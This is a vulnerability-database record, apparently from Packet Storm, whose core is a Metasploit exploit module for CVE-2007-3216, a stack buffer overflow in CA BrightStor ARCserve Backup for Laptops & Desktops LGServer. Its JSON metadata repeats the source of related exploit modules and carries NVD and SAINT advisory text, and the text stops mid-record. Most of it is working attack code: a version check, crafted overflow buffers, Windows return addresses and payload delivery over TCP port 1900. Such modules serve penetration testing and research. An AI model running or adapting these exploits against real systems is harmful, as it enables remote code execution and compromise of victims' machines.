ID PACKETSTORM:95525
Type packetstorm
Reporter MC
Modified 2010-11-05T00:00:00
Description
`##
# $Id: $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup
for Laptops & Desktops 11.1. By sending a specially crafted request (rxsSetDataGrowthScheduleAndFilter),
an attacker could overflow the buffer and execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10892 $',
'References' =>
[
[ 'CVE', '2007-3216' ],
[ 'OSVDB', '35329' ],
[ 'BID', '24348' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 700,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2000 SP4 English', { 'Ret' => 0x75031dce } ],
],
'DisclosureDate' => 'Jun 6 2007',
'DefaultTarget' => 0))
register_options([ Opt::RPORT(1900) ], self.class)
end
def check
connect
sock.put("0000000019rxrGetServerVersion")
ver = sock.get_once
disconnect
if ( ver =~ /11.1.742/ )
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
data = rand_text_alpha_upper(20080) + [target.ret].pack('V')
data << payload.encoded + rand_text_alpha_upper(25000 - 20084 - payload.encoded.length)
sploit = "0000025000" # Command Length Field
sploit << "rxsSetDataGrowthScheduleAndFilter" # RPC Command
sploit << "~~" # Constant Argument Delimiter
sploit << data
print_status("Trying target #{target.name}...")
sock.put(sploit)
handler
disconnect
end
end
`
{"hash": "06f7a23ad2b7213f10a5e4f4b2e93c3fe6ad0864916a4f80cd6c865ffe501a93", "edition": 1, "references": [], "objectVersion": "1.2", "viewCount": 0, "type": "packetstorm", "description": "", "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/95525/CA-BrightStor-ARCserve-for-Laptops-Desktops-LGServer-rxsSetDataGrowthScheduleAndFilter-Buffer-Overflow.html", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "2b88df3d48825de63c1c1029ba367557"}, {"key": "cvss", "hash": "2bdabeb49c44761f9565717ab0e38165"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "cc2ce6fd6ca0cf4c916c92e4f077e6a0"}, {"key": "modified", "hash": "0ea0847bba78aab0f6b7dd369fa89c31"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "0ea0847bba78aab0f6b7dd369fa89c31"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "92a54b358b4cf53cca4095e4697e1004"}, {"key": "sourceData", "hash": "3cd76f39802f377ed6f5d22c5a0542f3"}, {"key": "sourceHref", "hash": "abfdc6ff9d1188b2036b0b5e2fb612f7"}, {"key": "title", "hash": "b23295689999e99382fcf9dda0945292"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "published": "2010-11-05T00:00:00", "modified": "2010-11-05T00:00:00", "sourceData": "`## \n# $Id: $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \n \nRank = AverageRanking \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'CA BrightStor ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup \nfor Laptops & Desktops 11.1. By sending a specially crafted request (rxsSetDataGrowthScheduleAndFilter), \nan attacker could overflow the buffer and execute arbitrary code. \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 10892 $', \n'References' => \n[ \n[ 'CVE', '2007-3216' ], \n[ 'OSVDB', '35329' ], \n[ 'BID', '24348' ], \n], \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 700, \n'BadChars' => \"\\x00\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows 2000 SP4 English', { 'Ret' => 0x75031dce } ], \n], \n'DisclosureDate' => 'Jun 6 2007', \n'DefaultTarget' => 0)) \n \nregister_options([ Opt::RPORT(1900) ], self.class) \nend \n \ndef check \n \nconnect \n \nsock.put(\"0000000019rxrGetServerVersion\") \nver = sock.get_once \n \ndisconnect \n \nif ( ver =~ /11.1.742/ ) \nreturn Exploit::CheckCode::Vulnerable \nend \n \nreturn Exploit::CheckCode::Safe \n \nend \n \ndef exploit \n \nconnect \n \ndata = rand_text_alpha_upper(20080) + [target.ret].pack('V') \ndata << payload.encoded + rand_text_alpha_upper(25000 - 20084 - payload.encoded.length) \n \nsploit = \"0000025000\" # Command Length Field \nsploit << \"rxsSetDataGrowthScheduleAndFilter\" # RPC Command \nsploit << \"~~\" # Constant Argument Delimiter \nsploit << data \n \nprint_status(\"Trying target #{target.name}...\") \nsock.put(sploit) \n \nhandler \ndisconnect \n \nend \n \nend \n`\n", "cvelist": ["CVE-2007-3216"], "title": "CA BrightStor ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow", "history": [], "reporter": "MC", "lastseen": "2016-12-05T22:20:55", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "sourceHref": "https://packetstormsecurity.com/files/download/95525/lgserver_rxssetdatagrowthscheduleandfilter.rb.txt", "id": "PACKETSTORM:95525"}
{"cve": [{"lastseen": "2017-07-29T11:22:05", "references": ["http://www.securitytracker.com/id?1018216", "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=599", "http://www.securitytracker.com/id?1018728", "http://research.eeye.com/html/advisories/published/AD20070920.html", "http://www.vupen.com/english/advisories/2007/2121", "http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/caarcservebld-securitynotice.asp", "http://www.securityfocus.com/bid/24348", "https://exchange.xforce.ibmcloud.com/vulnerabilities/34805", "http://research.eeye.com/html/advisories/upcoming/20070604.html", "http://www.securityfocus.com/archive/1/archive/1/480252/100/100/threaded", "http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/bsabld-securitynotice.asp", "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=156006", "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35673"], "description": "Multiple buffer overflows in the LGServer component of CA (Computer Associates) BrightStor ARCserve Backup for Laptops and Desktops r11.1 allow remote attackers to execute arbitrary code via crafted arguments to the (1) rxsAddNewUser, (2) rxsSetUserInfo, (3) rxsRenameUser, (4) rxsSetMessageLogSettings, (5) rxsExportData, (6) rxsSetServerOptions, (7) rxsRenameFile, (8) rxsACIManageSend, (9) rxsExportUser, (10) rxsImportUser, (11) rxsMoveUserData, (12) rxsUseLicenseIni, (13) rxsLicGetSiteId, (14) rxsGetLogFileNames, (15) rxsGetBackupLog, (16) rxsBackupComplete, (17) rxsSetDataProtectionSecurityData, (18) rxsSetDefaultConfigName, (19) rxsGetMessageLogSettings, (20) rxsHWDiskGetTotal, (21) rxsHWDiskGetFree, (22) rxsGetSubDirs, (23) rxsGetServerDBPathName, (24) rxsSetServerOptions, (25) rxsDeleteFile, (26) rxsACIManageSend, (27) rxcReadBackupSetList, (28) rxcWriteConfigInfo, (29) rxcSetAssetManagement, (30) rxcWriteFileListForRestore, (31) rxcReadSaveSetProfile, (32) rxcInitSaveSetProfile, (33) rxcAddSaveSetNextAppList, (34) rxcAddSaveSetNextFilesPathList, (35) rxcAddNextBackupSetIncWildCard, (36) rxcGetRevisions, (37) rxrAddMovedUser, (38) rxrSetClientVersion, or (39) rxsSetDataGrowthScheduleAndFilter commands.", "edition": 2, "reporter": "NVD", "published": "2007-06-14T18:30:00", "title": "CVE-2007-3216", "type": "cve", "enchantments": {"score": {"modified": "2017-07-29T11:22:05", "vector": "NONE", "value": 9.3}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2007-3216"], "scanner": [], "modified": "2017-07-28T21:32:03", "cpe": ["cpe:/a:ca:brightstor_arcserve_backup_laptops_desktops:11.1"], "id": "CVE-2007-3216", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-3216", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:31", "references": [], "edition": 1, "description": "", "reporter": "MC", "published": "2010-11-05T00:00:00", "type": "packetstorm", "title": "CA BrightStor ARCserve for Laptops & Desktops LGServer Multiple Commands Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3216"], "modified": "2010-11-05T00:00:00", "href": "https://packetstormsecurity.com/files/95523/CA-BrightStor-ARCserve-for-Laptops-Desktops-LGServer-Multiple-Commands-Buffer-Overflow.html", "id": "PACKETSTORM:95523", "sourceData": "`## \n# $Id: lgserver_multi.rb 10909 2010-11-04 23:59:56Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \n \nRank = AverageRanking \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'CA BrightStor ARCserve for Laptops & Desktops LGServer Multiple Commands Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup \nfor Laptops & Desktops 11.1. By sending a specially crafted request to multiple commands, \nan attacker could overflow the buffer and execute arbitrary code. \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 10909 $', \n'References' => \n[ \n[ 'CVE', '2007-3216' ], \n[ 'OSVDB', '35329' ], \n[ 'BID', '24348' ], \n], \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 400, \n'BadChars' => \"\\x00\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows 2000 SP4 English', { 'Ret' => 0x75022ac4 } ], \n], \n'DisclosureDate' => 'Jun 6 2007', \n'DefaultTarget' => 0)) \n \nregister_options([ Opt::RPORT(1900) ], self.class) \nend \n \ndef check \n \nconnect \n \nsock.put(\"0000000019rxrGetServerVersion\") \nver = sock.get_once \n \ndisconnect \n \nif ( ver =~ /11.1.742/ ) \nreturn Exploit::CheckCode::Vulnerable \nend \n \nreturn Exploit::CheckCode::Safe \n \nend \n \ndef exploit \n \nconnect \n \nrpc_commands = [ \n\"rxsAddNewUser\", \n\"rxsSetUserInfo\", \n\"rxsRenameUser\", \n\"rxsExportData\", \n\"rxcReadSaveSetProfile\", \n\"rxcInitSaveSetProfile\", \n\"rxcAddSaveSetNextAppList\", \n\"rxcAddSaveSetNextFilesPathList\" \n] \n \nrpc_command = rpc_commands[rand(rpc_commands.length)] \n \ndata = rand_text_alpha_upper(62768) \n \ndata[58468,8] = generate_seh_record(target.ret) \ndata[58476,payload.encoded.length] = payload.encoded \n \nsploit = \"0000062768\" # Command Length Field \nsploit << rpc_command # RPC Command \nsploit << \"~~\" # Constant Argument Delimiter \nsploit << data \n \nprint_status(\"Trying target #{target.name} with command '#{rpc_command}'...\") \nsock.put(sploit) \n \nhandler \ndisconnect \n \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/95523/lgserver_multi.rb.txt"}, {"lastseen": "2016-12-05T22:11:43", "references": [], "edition": 1, "description": "", "reporter": "MC", "published": "2009-11-26T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "packetstorm", "title": "CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3216"], "modified": "2009-11-26T00:00:00", "href": "https://packetstormsecurity.com/files/83135/CA-BrightStor-ARCserve-for-Laptops-Desktops-LGServer-Buffer-Overflow.html", "id": "PACKETSTORM:83135", "sourceData": "`## \n# $Id: lgserver_rxsuselicenseini.rb \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Computer Associates BrightStor ARCserve Backup \nfor Laptops & Desktops 11.1. By sending a specially crafted request (rxsUseLicenseIni), an \nattacker could overflow the buffer and execute arbitrary code. \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2007-3216' ], \n[ 'OSVDB', '35329' ], \n[ 'BID', '24348' ], \n], \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 700, \n'BadChars' => \"\\x00\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows 2003 SP0 English', { 'Ret' => 0x71ae1f9b } ], \n[ 'Windows 2000 SP4 English', { 'Ret' => 0x75031dce } ], \n \n], \n'DisclosureDate' => 'Jun 6 2007', \n'DefaultTarget' => 0)) \n \nregister_options([ Opt::RPORT(1900) ], self.class) \nend \n \ndef check \nconnect \n \nsock.puts(\"0000000019rxrGetServerVersion\") \nver = sock.get_once \n \ndisconnect \n \nif ( ver =~ /11.1.742/ ) \nreturn Exploit::CheckCode::Vulnerable \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nconnect \n \ndata = rand_text_alpha_upper(4108) + [target.ret].pack('V') \ndata << payload.encoded + rand_text_alpha_upper(rand(300) + 1) \n \nsploit = \"0000004820\" # Command Length Field \nsploit << \"rxsUseLicenseIni\" # RPC Command \nsploit << \"~~\" # Constant Argument Delimiter \nsploit << data \n \nprint_status(\"Trying target #{target.name}...\") \n# One-shot overwrite... \nsock.puts(sploit) \n \nhandler \ndisconnect \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/83135/lgserver_rxsuselicenseini.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2018-08-31T00:08:19", "references": [], "description": "Added: 01/11/2008 \nCVE: [CVE-2007-3216](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3216>) \nBID: [24348](<http://www.securityfocus.com/bid/24348>) \nOSVDB: [35329](<http://www.osvdb.org/35329>) \n\n\n### Background\n\n[BrightStor ARCserve Backup for Laptops and Desktops](<http://www.ca.com/us/products/product.aspx?id=263>) is an automated backup solution optimized for low-bandwidth, intermittent network connections. \n\n### Problem\n\nA buffer overflow vulnerability in the `**rxsUseLicenseIni**` function allows remote attackers to execute arbitrary commands by sending a specially crafted request to the LGServer on port 1900. \n\n### Resolution\n\nApply one of the updates referenced in the [Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/caarcservebld-securitynotice.asp>). \n\n### References\n\n<http://www.frsirt.com/english/advisories/2007/2121> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup for Laptops and Desktops 11.1 SP1. \n\n### Platforms\n\nWindows 2000 \nWindows Server 2003 \n \n\n", "edition": 3, "reporter": "SAINT Corporation", "published": "2008-01-11T00:00:00", "title": "BrightStor ARCserve Backup LGServer rxsUseLicenseIni buffer overflow", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3216"], "modified": "2008-01-11T00:00:00", "id": "SAINT:3081A95B6A8579C20E90845521890B2D", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_rxsuselicenseini", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-14T16:58:03", "references": [], "edition": 1, "description": "Added: 01/11/2008 \nCVE: [CVE-2007-3216](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3216>) \nBID: [24348](<http://www.securityfocus.com/bid/24348>) \nOSVDB: [35329](<http://www.osvdb.org/35329>) \n\n\n### Background\n\n[BrightStor ARCserve Backup for Laptops and Desktops](<http://www.ca.com/us/products/product.aspx?id=263>) is an automated backup solution optimized for low-bandwidth, intermittent network connections. \n\n### Problem\n\nA buffer overflow vulnerability in the `**rxsUseLicenseIni**` function allows remote attackers to execute arbitrary commands by sending a specially crafted request to the LGServer on port 1900. \n\n### Resolution\n\nApply one of the updates referenced in the [Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/caarcservebld-securitynotice.asp>). \n\n### References\n\n<http://www.frsirt.com/english/advisories/2007/2121> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup for Laptops and Desktops 11.1 SP1. \n\n### Platforms\n\nWindows 2000 \nWindows Server 2003 \n \n\n", "reporter": "SAINT Corporation", "published": "2008-01-11T00:00:00", "type": "saint", "title": "BrightStor ARCserve Backup LGServer rxsUseLicenseIni buffer overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3216"], "modified": "2008-01-11T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_rxsuselicenseini", "id": "SAINT:58F4061114E890C4F0819ADA685DFAB3", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-10-03T15:01:55", "references": [], "description": "Added: 01/11/2008 \nCVE: [CVE-2007-3216](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3216>) \nBID: [24348](<http://www.securityfocus.com/bid/24348>) \nOSVDB: [35329](<http://www.osvdb.org/35329>) \n\n\n### Background\n\n[BrightStor ARCserve Backup for Laptops and Desktops](<http://www.ca.com/us/products/product.aspx?id=263>) is an automated backup solution optimized for low-bandwidth, intermittent network connections. \n\n### Problem\n\nA buffer overflow vulnerability in the `**rxsUseLicenseIni**` function allows remote attackers to execute arbitrary commands by sending a specially crafted request to the LGServer on port 1900. \n\n### Resolution\n\nApply one of the updates referenced in the [Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/caarcservebld-securitynotice.asp>). \n\n### References\n\n<http://www.frsirt.com/english/advisories/2007/2121> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup for Laptops and Desktops 11.1 SP1. \n\n### Platforms\n\nWindows 2000 \nWindows Server 2003 \n \n\n", "edition": 1, "reporter": "SAINT Corporation", "published": "2008-01-11T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "saint", "title": "BrightStor ARCserve Backup LGServer rxsUseLicenseIni buffer overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3216"], "modified": "2008-01-11T00:00:00", "id": "SAINT:3B169CAD3745422661F668D355838E33", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_rxsuselicenseini", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2018-02-27T21:00:25", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. By sending a specially crafted request (rxsUseLicenseIni), an attacker could overflow the buffer and execute arbitrary code.", "reporter": "Rapid7", "published": "2008-08-02T15:03:13", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb", "type": "metasploit", "title": "CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3216"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Average", "id": "MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/LGSERVER_RXSUSELICENSEINI", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n for Laptops & Desktops 11.1. By sending a specially crafted request (rxsUseLicenseIni), an\n attacker could overflow the buffer and execute arbitrary code.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2007-3216' ],\n [ 'OSVDB', '35329' ],\n [ 'BID', '24348' ],\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 700,\n 'BadChars' => \"\\x00\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows 2003 SP0 English',\t{ 'Ret' => 0x71ae1f9b } ],\n [ 'Windows 2000 SP4 English',\t{ 'Ret' => 0x75031dce } ],\n ],\n 'DisclosureDate' => 'Jun 6 2007',\n 'DefaultTarget' => 0))\n\n register_options([ Opt::RPORT(1900) ])\n end\n\n def check\n connect\n\n sock.put(\"0000000019rxrGetServerVersion\")\n ver = sock.get_once\n\n disconnect\n\n if ( ver and ver =~ /11\\.1\\.742/ )\n return Exploit::CheckCode::Appears\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n connect\n\n data = rand_text_alpha_upper(4108) + [target.ret].pack('V')\n data << payload.encoded + rand_text_alpha_upper(rand(300) + 1)\n\n sploit = \"0000004820\" # Command Length Field\n sploit << \"rxsUseLicenseIni\" # RPC Command\n sploit << \"~~\" # Constant Argument Delimiter\n sploit << data\n\n print_status(\"Trying target #{target.name}...\")\n # One-shot overwrite...\n sock.put(sploit)\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb"}, {"lastseen": "2018-09-06T03:51:56", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. By sending a specially crafted request (rxsSetDataGrowthScheduleAndFilter), an attacker could overflow the buffer and execute arbitrary code.", "reporter": "Rapid7", "published": "2010-11-04T01:51:54", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb", "type": "metasploit", "title": "CA BrightStor ARCserve for Laptops and Desktops LGServer rxsSetDataGrowthScheduleAndFilter Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3216"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Average", "id": "MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/LGSERVER_RXSSETDATAGROWTHSCHEDULEANDFILTER", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'CA BrightStor ARCserve for Laptops and Desktops LGServer rxsSetDataGrowthScheduleAndFilter Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n for Laptops & Desktops 11.1. By sending a specially crafted request (rxsSetDataGrowthScheduleAndFilter),\n an attacker could overflow the buffer and execute arbitrary code.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2007-3216' ],\n [ 'OSVDB', '35329' ],\n [ 'BID', '24348' ],\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 700,\n 'BadChars' => \"\\x00\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows 2000 SP4 English',\t{ 'Ret' => 0x75031dce } ],\n ],\n 'DisclosureDate' => 'Jun 6 2007',\n 'DefaultTarget' => 0))\n\n register_options([ Opt::RPORT(1900) ])\n end\n\n def check\n\n connect\n\n sock.put(\"0000000019rxrGetServerVersion\")\n ver = sock.get_once\n\n disconnect\n\n if ( ver and ver =~ /11\\.1\\.742/ )\n return Exploit::CheckCode::Appears\n end\n\n return Exploit::CheckCode::Safe\n\n end\n\n def exploit\n\n connect\n\n data = rand_text_alpha_upper(20080) + [target.ret].pack('V')\n data << payload.encoded + rand_text_alpha_upper(25000 - 20084 - payload.encoded.length)\n\n sploit = \"0000025000\"\t\t\t\t# Command Length Field\n sploit << \"rxsSetDataGrowthScheduleAndFilter\"\t# RPC Command\n sploit << \"~~\"\t\t\t\t\t# Constant Argument Delimiter\n sploit << data\n\n print_status(\"Trying target #{target.name}...\")\n sock.put(sploit)\n\n handler\n disconnect\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb"}, {"lastseen": "2018-03-15T12:02:57", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. By sending a specially crafted request to multiple commands, an attacker could overflow the buffer and execute arbitrary code.", "reporter": "Rapid7", "published": "2010-11-04T22:19:26", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/brightstor/lgserver_multi.rb", "type": "metasploit", "title": "CA BrightStor ARCserve for Laptops and Desktops LGServer Multiple Commands Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3216"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Average", "id": "MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/LGSERVER_MULTI", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'CA BrightStor ARCserve for Laptops and Desktops LGServer Multiple Commands Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n for Laptops & Desktops 11.1. By sending a specially crafted request to multiple commands,\n an attacker could overflow the buffer and execute arbitrary code.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2007-3216' ],\n [ 'OSVDB', '35329' ],\n [ 'BID', '24348' ],\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => 